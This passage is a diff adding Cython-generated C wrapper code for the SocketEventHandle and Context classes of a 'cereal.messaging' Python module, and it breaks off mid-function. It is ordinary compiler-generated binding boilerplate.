__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + std::string __pyx_v_endpoint; + std::string __pyx_v_identifier; + bool __pyx_v_override; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_endpoint,&__pyx_n_s_identifier,&__pyx_n_s_override,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_endpoint)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 88, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_identifier)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 88, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 3, 3, 1); __PYX_ERR(0, 88, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_override)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 88, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 3, 3, 2); __PYX_ERR(0, 88, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(0, 88, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + } + __pyx_v_endpoint = __pyx_convert_string_from_py_std__in_string(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 88, __pyx_L3_error) + __pyx_v_identifier = __pyx_convert_string_from_py_std__in_string(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 88, __pyx_L3_error) + __pyx_v_override = __Pyx_PyObject_IsTrue(values[2]); if (unlikely((__pyx_v_override == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 88, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 88, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SocketEventHandle.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle___cinit__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *)__pyx_v_self), __PYX_STD_MOVE_IF_SUPPORTED(__pyx_v_endpoint), __PYX_STD_MOVE_IF_SUPPORTED(__pyx_v_identifier), __pyx_v_override); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle___cinit__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self, std::string __pyx_v_endpoint, std::string __pyx_v_identifier, bool __pyx_v_override) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":89 + * + * def __cinit__(self, string endpoint, string identifier, bool override): + * self.handle = new cppSocketEventHandle(endpoint, identifier, override) # <<<<<<<<<<<<<< + * + * def __dealloc__(self): + */ + __pyx_v_self->handle = new SocketEventHandle(__pyx_v_endpoint, __pyx_v_identifier, __pyx_v_override); + + /* "cereal/messaging/messaging_pyx.pyx":88 + * cdef cppSocketEventHandle * handle; + * + * def __cinit__(self, string endpoint, string identifier, bool override): # <<<<<<<<<<<<<< + * self.handle = new cppSocketEventHandle(endpoint, identifier, override) + * + */ + + /* function exit code */ + __pyx_r = 0; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":91 + * self.handle = new cppSocketEventHandle(endpoint, identifier, override) + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.handle + * + */ + +/* Python wrapper */ +static void __pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_3__dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_3__dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_2__dealloc__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_2__dealloc__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":92 + * + * def __dealloc__(self): + * del self.handle # <<<<<<<<<<<<<< + * + * @property + */ + delete __pyx_v_self->handle; + + /* "cereal/messaging/messaging_pyx.pyx":91 + * self.handle = new cppSocketEventHandle(endpoint, identifier, override) + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.handle + * + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "cereal/messaging/messaging_pyx.pyx":94 + * del self.handle + * + * @property # <<<<<<<<<<<<<< + * def enabled(self): + * return self.handle.is_enabled() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7enabled_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7enabled_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7enabled___get__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7enabled___get__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":96 + * @property + * def enabled(self): + * return self.handle.is_enabled() # <<<<<<<<<<<<<< + * + * @enabled.setter + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBool_FromLong(__pyx_v_self->handle->is_enabled()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 96, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/messaging/messaging_pyx.pyx":94 + * del self.handle + * + * @property # <<<<<<<<<<<<<< + * def enabled(self): + * return self.handle.is_enabled() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SocketEventHandle.enabled.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":98 + * return self.handle.is_enabled() + * + * @enabled.setter # <<<<<<<<<<<<<< + * def enabled(self, bool value): + * self.handle.set_enabled(value) + */ + +/* Python wrapper */ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7enabled_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_arg_value); /*proto*/ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7enabled_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_arg_value) { + bool __pyx_v_value; + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + assert(__pyx_arg_value); { + __pyx_v_value = __Pyx_PyObject_IsTrue(__pyx_arg_value); if (unlikely((__pyx_v_value == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 99, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SocketEventHandle.enabled.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7enabled_2__set__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *)__pyx_v_self), ((bool)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7enabled_2__set__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self, bool __pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":100 + * @enabled.setter + * def enabled(self, bool value): + * self.handle.set_enabled(value) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_v_self->handle->set_enabled(__pyx_v_value); + + /* "cereal/messaging/messaging_pyx.pyx":98 + * return self.handle.is_enabled() + * + * @enabled.setter # <<<<<<<<<<<<<< + * def enabled(self, bool value): + * self.handle.set_enabled(value) + */ + + /* function exit code */ + __pyx_r = 0; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":102 + * self.handle.set_enabled(value) + * + * @property # <<<<<<<<<<<<<< + * def recv_called_event(self): + * e = Event() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_17recv_called_event_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_17recv_called_event_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_17recv_called_event___get__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_17recv_called_event___get__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self) { + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_e = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":104 + * @property + * def recv_called_event(self): + * e = Event() # <<<<<<<<<<<<<< + * e.setEvent(self.handle.recv_called()) + * + */ + __pyx_t_1 = __Pyx_PyObject_CallNoArg(((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 104, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_e = ((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)__pyx_t_1); + __pyx_t_1 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":105 + * def recv_called_event(self): + * e = Event() + * e.setEvent(self.handle.recv_called()) # <<<<<<<<<<<<<< + * + * return e + */ + __pyx_t_1 = ((struct __pyx_vtabstruct_6cereal_9messaging_13messaging_pyx_Event *)__pyx_v_e->__pyx_vtab)->setEvent(__pyx_v_e, __pyx_v_self->handle->recv_called()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 105, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":107 + * e.setEvent(self.handle.recv_called()) + * + * return e # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_e); + __pyx_r = ((PyObject *)__pyx_v_e); + goto __pyx_L0; + + /* "cereal/messaging/messaging_pyx.pyx":102 + * self.handle.set_enabled(value) + * + * @property # <<<<<<<<<<<<<< + * def recv_called_event(self): + * e = Event() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SocketEventHandle.recv_called_event.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_e); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":109 + * return e + * + * @property # <<<<<<<<<<<<<< + * def recv_ready_event(self): + * e = Event() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_16recv_ready_event_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_16recv_ready_event_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_16recv_ready_event___get__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_16recv_ready_event___get__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self) { + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_e = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":111 + * @property + * def recv_ready_event(self): + * e = Event() # <<<<<<<<<<<<<< + * e.setEvent(self.handle.recv_ready()) + * + */ + __pyx_t_1 = __Pyx_PyObject_CallNoArg(((PyObject *)__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_e = ((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)__pyx_t_1); + __pyx_t_1 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":112 + * def recv_ready_event(self): + * e = Event() + * e.setEvent(self.handle.recv_ready()) # <<<<<<<<<<<<<< + * + * return e + */ + __pyx_t_1 = ((struct __pyx_vtabstruct_6cereal_9messaging_13messaging_pyx_Event *)__pyx_v_e->__pyx_vtab)->setEvent(__pyx_v_e, __pyx_v_self->handle->recv_ready()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 112, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":114 + * e.setEvent(self.handle.recv_ready()) + * + * return e # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_e); + __pyx_r = ((PyObject *)__pyx_v_e); + goto __pyx_L0; + + /* "cereal/messaging/messaging_pyx.pyx":109 + * return e + * + * @property # <<<<<<<<<<<<<< + * def recv_ready_event(self): + * e = Event() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SocketEventHandle.recv_ready_event.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_e); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_5__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_5__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_5__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_5__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_4__reduce_cython__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_4__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SocketEventHandle.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SocketEventHandle.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_6__setstate_cython__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_6__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SocketEventHandle.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":120 + * cdef cppContext * context + * + * def __cinit__(self): # <<<<<<<<<<<<<< + * self.context = cppContext.create() + * + */ + +/* Python wrapper */ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 0, 0, __pyx_nargs); return -1;} + if (unlikely(__pyx_kwds) && 